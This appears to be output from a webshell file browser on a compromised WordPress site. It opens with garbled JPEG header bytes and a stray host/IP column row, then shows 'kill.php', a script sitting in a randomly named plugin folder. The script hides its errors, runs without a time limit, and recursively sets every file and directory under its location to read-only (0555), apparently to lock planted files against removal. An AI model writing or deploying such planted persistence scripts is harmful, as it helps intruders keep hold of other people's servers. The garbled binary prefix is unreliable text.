ascvh@#%(^-^)V ?host,ip,port,protocol,title,domain,country,city,link,org ???à JFIF  x x ?? C         ?? C   ?à   " ??     ?? μ  } !1AQa "q2?‘?#B±áR?e$3br? %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz??…???‰?’“”?–—???¢£¤¥|§¨?a23′μ?·?1o??????èéêòó???×?ùúáa?????èéê?òó???÷?ùú??     ?? μ   w !1AQ aq"2?B‘?±á #3Rebr?{ gilour

File "kill.php"

Full Path: /home/zcziejy/ryadselyen/wp-content/plugins/gmnzqum/kill.php
File size: 719 bytes
MIME-type: text/x-php
Charset: utf-8

<?php
set_time_limit(0);
error_reporting(E_ALL);
ini_set('display_errors', 0);

function chmodRecursive(string $path, int $perm = 0555): void {
    if (!file_exists($path)) return;

    if (is_dir($path)) {
        @chmod($path, $perm);
        $items = scandir($path);
        if ($items === false) return;

        foreach ($items as $item) {
            if ($item === '.' || $item === '..') continue;
            chmodRecursive($path . DIRECTORY_SEPARATOR . $item, $perm);
        }
    } else {
        @chmod($path, $perm);
    }
}

$startPath = __DIR__;
chmodRecursive($startPath);

echo "<h3 style='color:green'>✅ All permissions set to 0555 under: <code>$startPath</code></h3>";
?>